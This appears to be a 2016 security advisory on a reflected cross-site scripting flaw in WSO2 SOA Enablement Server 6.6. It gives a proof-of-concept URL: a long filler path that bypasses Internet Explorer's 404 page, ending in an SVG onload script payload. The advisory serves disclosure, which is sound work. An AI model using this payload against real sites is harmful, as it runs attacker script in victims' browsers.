WSO2 SOA Enablement server suffers from a cross site scripting vulnerability.
31d43f863469f43424bafc72bcd4ad822cc16db33e6a9b0bf7ffb2914a174118
Title: WSO2 SOA Enablement Server - Reflected Cross-Site Scripting
Authors: Jakub Pałaczyński, Łukasz Juszczyk
Date: 08. April 2016
Affected Software:
=============
WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616
Probably other versions are also vulnerable.
Proof of Concept:
============
PoC works only in IE browser - path is reflected in the response and needs
to be long enough to bypass IE's 404 page substitution:
https://host:6443/xssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxssxss
<svg/onload=alert(document.domain)>
Patch:
=====
Vendor has already released patch for this issue.